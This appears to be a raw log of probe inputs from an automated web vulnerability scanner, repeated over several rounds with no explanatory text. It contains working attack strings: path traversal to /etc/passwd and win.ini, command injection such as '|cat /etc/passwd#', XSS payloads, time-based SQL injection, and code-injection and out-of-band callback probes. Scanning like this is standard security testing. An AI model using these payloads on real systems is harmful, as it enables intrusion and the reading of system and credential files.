SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

-1

1<img/src=">" onerror=alert(928214)>

1

1

1

${100070+99374}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(997774)</sCripT>

1

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1&lt

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n913394=v985271

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1

\xf6<img acu onmouseover=prompt(918094) //\xf6>

PJgUAVpO'

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1<input autofocus onfocus=prompt(985201)>

EvqoElPk')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

/etc/passwd

^(#$!@#$)(()))******

aIt0QY6X'))

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_03gKy <ScRiPt >prompt(995088)</ScRiPt>

-1)

http://hitUH9TAW8Rom.bxss.me/

"

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1))

1

||cat /etc/passwd

comments

1

1

1

9CEadl4k'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

&dir

file:///etc/passwd

1

cyZioXHI')

1

http://www.acunetix.tst

1

1

'"

comments/.

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1'"()&%<ScRiPt >prompt(907232)</ScRiPt>

slBlFhQM'))

1

1

1

<!--

"&dir&"

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(990185)</ScRiPt>

1

1

1_964317

1

WEB-INF\web.xml

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu7817\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7817

'|dir

1

1

1

../../../../../../../../../../boot.ini

acux8728\xc0\xbez1\xc0\xbcz2a\x90bcxuca8728

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(944474)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(992238)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(904730)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950176></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(950713)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(919005)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998633)"></g></svg>

1

1

1

1<div style=width:expression(prompt(971510))>

1

WEB-INF/web.xml

response.write(9506713*9872681)

1

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

&cat /etc/passwd&

'+response.write(9506713*9872681)+'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937657)>

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

"+response.write(9506713*9872681)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979824)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6.874),0)/*'XOR(if(now()=sysdate(),sleep(6.874),0))OR'"XOR(if(now()=sysdate(),sleep(6.874),0))OR"*/

1

1<img src=xyz OnErRor=prompt(948432)>

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(923337)>

(select(0)from(select(sleep(6.874)))v)/*'+(select(0)from(select(sleep(6.874)))v)+'"+(select(0)from(select(sleep(6.874)))v)+"*/

1

${100065+99361}

1

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(998195)</sCripT>

-1

1

1

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n989471=v920502

1&lt

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(988039) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

-1))

1

!(()&&!|*|*|

1

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(962802)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

AGcnAWRf'

1

^(#$!@#$)(()))******

1

1

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

"|"ld

/etc/passwd

'

obf9zj9z')

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

wKnjd52k'))

"

1

1

1_VkeOb <ScRiPt >prompt(944290)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

http://hitZ2OqG7dT9d.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

||cat /etc/passwd

-1))

1

1

comments

1

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

qxwyZ0xi'

1

http://www.acunetix.tst

comments

'"

1'"()&%<ScRiPt >prompt(977417)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'&dir&'

comments/.

OvLKFuM8')

1

<!--

'"()&%<ScRiPt >prompt(936705)</ScRiPt>

WEB-INF/web.xml

1

1

"&dir&"

1

fUYhcIZ3'))

1

WEB-INF\web.xml

1_969970

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

acu1981\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1981

1

1

'|dir

../../../../../../../../../../boot.ini

1

acux5210\xc0\xbez1\xc0\xbcz2a\x90bcxuca5210

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(910071)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(988870)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(936597)</ScRiPt>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981950></ScRiPt>

1

1

1

1<ScRiPt >prompt(946063)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(996175)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974919)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(953435))>

1

1

1

1

WEB-INF/web.xml

response.write(9581969*9259747)

1<iframe src='data:text/html

'+response.write(9581969*9259747)+'

&cat /etc/passwd&

WEB-INF\web.xml

1

1<body onload=prompt(932957)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

"+response.write(9581969*9259747)+"

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935931)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(919462)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(932896)>

-1

1

${99553+99584}

1

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(910786)</sCripT>

-1)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1&n910025=v977659

-1))

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

1

\xf6<img acu onmouseover=prompt(940668) //\xf6>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

A8B5ary4'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

"|"ld

1<input autofocus onfocus=prompt(935070)>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

MMPdRdAw')

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

/etc/passwd

1

3Ijhu8Us'))

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

"

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

1_Rl3hN <ScRiPt >prompt(943370)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

-1)

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

http://hitpTFODN36yu.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

1

1

comments

vAq462nc'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

1

1

'&dir&'

CCOtOm0F')

http://www.acunetix.tst

1

1

'"

file:///etc/passwd

1

1

1'"()&%<ScRiPt >prompt(965014)</ScRiPt>

"&dir&"

PIpEhZJn'))

1

1

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

'"()&%<ScRiPt >prompt(966649)</ScRiPt>

1

1

1

1_931177

WEB-INF/web.xml

1

'|dir

1

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

acu2252\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2252

1

1

1

../../../../../../../../../../boot.ini

1

acux7441\xc0\xbez1\xc0\xbcz2a\x90bcxuca7441

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(995407)</ScRiPt>

1

1

1<script>prompt(958666)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(909568)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948773></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(976350)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(948354)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998351)"></g></svg>

1

response.write(9479384*9616041)

1

1<div style=width:expression(prompt(930112))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9479384*9616041)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

"+response.write(9479384*9616041)+"

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(990093)>

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973242)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(976601)>

1

1

`cat /etc/passwd`

-1

1

1

1

1

1<img/src=">" onerror=alert(916059)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99102+100412}

|cat /etc/passwd#

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(906277)</sCripT>

1

1

1&n999419=v969543

-1))

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1

sRb9UZzj'

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(984721) //\xf6>

1

!(()&&!|*|*|

icBRerjL')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

1<input autofocus onfocus=prompt(967319)>

/etc/passwd

1

^(#$!@#$)(()))******

'

oJiHJCKX'))

1

testasp.vulnweb.com

'

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1_e8tEY <ScRiPt >prompt(924602)</ScRiPt>

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

acunetix_wvs_invalid_filename

http://hitzskVJTuke0.bxss.me/

1

&dir

1

1

1

XyDxm3Jp'

comments

1

1

1

'&dir&'

1

file:///etc/passwd

1

"&dir&"

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

pUG06j8N')

1

http://www.acunetix.tst

1

'"

/\../\../\../\../\../\../\../etc/passwd

KExQAiFP'))

comments/.

|dir

1'"()&%<ScRiPt >prompt(974216)</ScRiPt>

1

1

1

WEB-INF/web.xml

<!--

1

1

1

'|dir

'"()&%<ScRiPt >prompt(944073)</ScRiPt>

WEB-INF\web.xml

1

1

1

1

1_911470

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu5284\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5284

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9551\xc0\xbez1\xc0\xbcz2a\x90bcxuca9551

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(942121)</ScRiPt>

1

1

1

1

1<script>prompt(953105)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(991041)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929326></ScRiPt>

1

1

1

1<ScRiPt >prompt(992669)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(959055)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936716)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(990732))>

1

response.write(9453164*9896926)

1

1

WEB-INF/web.xml

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

'+response.write(9453164*9896926)+'

WEB-INF\web.xml

'&cat /etc/passwd&'

1<body onload=prompt(996913)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9453164*9896926)+"

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929202)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(940749)>

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(996954)>

1

`cat /etc/passwd`

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(989485)</sCripT>

1

|cat /etc/passwd#

1

${99019+100396}

'|'ld

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&lt

1

1

"|"ld

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n929037=v952644

\xf6<img acu onmouseover=prompt(973550) //\xf6>

)

CVyoO3jz'

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<input autofocus onfocus=prompt(918759)>

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

'

dHtpV5kD')

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

JlBXW6De'))

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

http://hitRlTFqfBpuu.bxss.me/

1_2mq6E <ScRiPt >prompt(908066)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

${@print(md5(acunetix_wvs_security_test))}\

-1)

acunetix_wvs_invalid_filename

1

1

1

1

1

1

'&dir&'

-1))

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

"&dir&"

file:///etc/passwd

Z0vzzOsi'

comments

1

1

1

1

http://www.acunetix.tst

|dir

1

'"

comments/.

1'"()&%<ScRiPt >prompt(978263)</ScRiPt>

xuHVPEiF')

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'|dir

BhysWsUh'))

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(988102)</ScRiPt>

<!--

1

1

"|dir

1

1

1_966420

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acu8279\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8279

1

acux4290\xc0\xbez1\xc0\xbcz2a\x90bcxuca4290

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(904581)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(930255)</script>

1

1

1<ScRiPt >prompt(930367)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984228></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(984018)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(976230)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950002)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(954777))>

1

1

1

1<iframe src='data:text/html

1

response.write(9337187*9058188)

1

1

1<body onload=prompt(974422)>

WEB-INF/web.xml

1

'+response.write(9337187*9058188)+'

1

&cat /etc/passwd&

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917306)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9337187*9058188)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(927641)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(946002)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<ScRiPt%20>prompt(926456)</sCripT>

1

-1

${99854+99617}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&lt

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1&n924200=v938561

\xf6<img acu onmouseover=prompt(983922) //\xf6>

)

-1))

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<input autofocus onfocus=prompt(900070)>

'|'ld

1

1

!(()&&!|*|*|

Zi8KXGbr'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1

"|"ld

oruARZkY')

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

[url=http://www.acunetix.com]website security[/url]

testasp.vulnweb.com

1

'"()

1

bYyh40x5'))

'

/etc/passwd

1_pLOM9 <ScRiPt >prompt(995980)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

1

"

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1))

1

1

http://hit8BFmHBVXgO.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

2nNQ4BIo'

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

comments

http://www.acunetix.tst

xKAi8uaZ')

1

1

1

1

file:///etc/passwd

'&dir&'

1

'"

comments

1

eqkRUn9o'))

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(975779)</ScRiPt>

<!--

1

"&dir&"

comments/.

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(966066)</ScRiPt>

|dir

1

1

1

1

1

WEB-INF\web.xml

'|dir

1

1_997147

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu7594\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7594

1

../../../../../../../../../../boot.ini

1

1

1

acux3497\xc0\xbez1\xc0\xbcz2a\x90bcxuca3497

1

1<ScRiPt >prompt(941456)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(962000)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(927900)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(916248)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(963331)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964734)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(978282))>

1

response.write(9650543*9929277)

1

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

'+response.write(9650543*9929277)+'

1

1

1<body onload=prompt(916554)>

'&cat /etc/passwd&'

1

"+response.write(9650543*9929277)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980767)>

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

